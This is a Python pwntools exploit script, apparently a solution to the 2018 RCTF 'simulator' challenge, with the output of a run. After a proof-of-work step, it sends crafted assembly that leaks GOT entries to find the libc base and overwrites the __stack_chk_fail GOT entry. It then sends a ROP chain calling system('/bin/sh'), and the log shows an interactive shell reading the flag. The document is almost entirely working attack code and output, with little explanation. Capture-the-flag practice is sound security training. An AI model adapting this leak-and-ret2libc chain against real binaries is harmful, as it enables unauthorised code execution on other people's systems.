Rating: 1.0

```
from pwn import *
from time import sleep
from hashlib import sha256
import itertools
import string

def pow():
prefix = t.recvline().strip()
log.info("Calculating PoW: {}".format(prefix))
x = [chr(i) for i in range(0, 256)]
val = None

for combo in itertools.combinations_with_replacement(x,4):
if sha256(prefix + ''.join(combo)).digest().startswith('\0\0\0'):
log.info("Done: {}".format(sha256(prefix + ''.join(combo)).hexdigest()))
val = ''.join(combo)
break

if val:
t.sendline(val)
else:
log.info("Failed PoW")

#t = process('./simulator', env={'LD_PRELOAD': '/home/bob/sim_libc.so'})
#print("Attach...")
#sleep(4)

t = remote('simulator.2018.teamrois.cn', 3131)
pow()

code = """
# # Leak GOT entry of feof
# li $t0, 3766524421
# lw $t1, $t0
# move $a0, $t1
# li $v0, 1
# syscall

# # Leak GOT entry of setvbuf
# li $t0, 3766524424
# lw $t1, $t0
# move $a0, $t1
# li $v0, 1
# syscall

# # Leak GOT entry of __libc_start_main
li $t0, 3766524423
lw $t1, $t0
#move $a0, $t1
#li $v0, 1
#syscall

# Subtract to get libc base and leak
li $t0, 3766524421
lw $t1, $t0
li $s0, 411664
sub $t2, $t1, $s0
move $a0, $t2
li $v0, 1
syscall

# Overwrite __stack_chk_fail GOT to point to "leave; ret"
li $t0, 134523990
li $t1, 3766524419
sw $t0, $t1

END
"""

t.send(code)

# Receive libc leak
base = t.recvline()
base = (0xffffffff + 1) + int(base)

binsh = base + 0x15902b
system = base + 0x3a940
log.info("libc base: {}".format(hex(base)))
log.info("/bin/sh: {}".format(hex(binsh)))
log.info("system: {}".format(hex(system)))

# ROP to victory
buf = "A"*44 + 'BBBB'
buf += p32(system)
buf += p32(0xdeadbeef)
buf += p32(binsh)

log.info("Executing system('/bin/sh')")
t.sendline(buf)

t.recv()
t.interactive()
```

Running this gives:
```
vagrant@vagrant:~$ python /vagrant/shared/simulator.py
[+] Opening connection to simulator.2018.teamrois.cn on port 3131: Done
[*] Calculating PoW: IlBn0dsx9Hj0daP0
[*] Done: 00000091b2fa928489c69cfe2474309c3db3c26640958cb4152ce8a8762337d8
[*] libc base: 0xf7d9a000
[*] /bin/sh: 0xf7ef302b
[*] system: 0xf7dd4940
[*] Executing system('/bin/sh')
[*] Switching to interactive mode
$ cat flag
RCTF{5imu_s1mu_sinnu_siml_l_simulator!_7a3dac}
```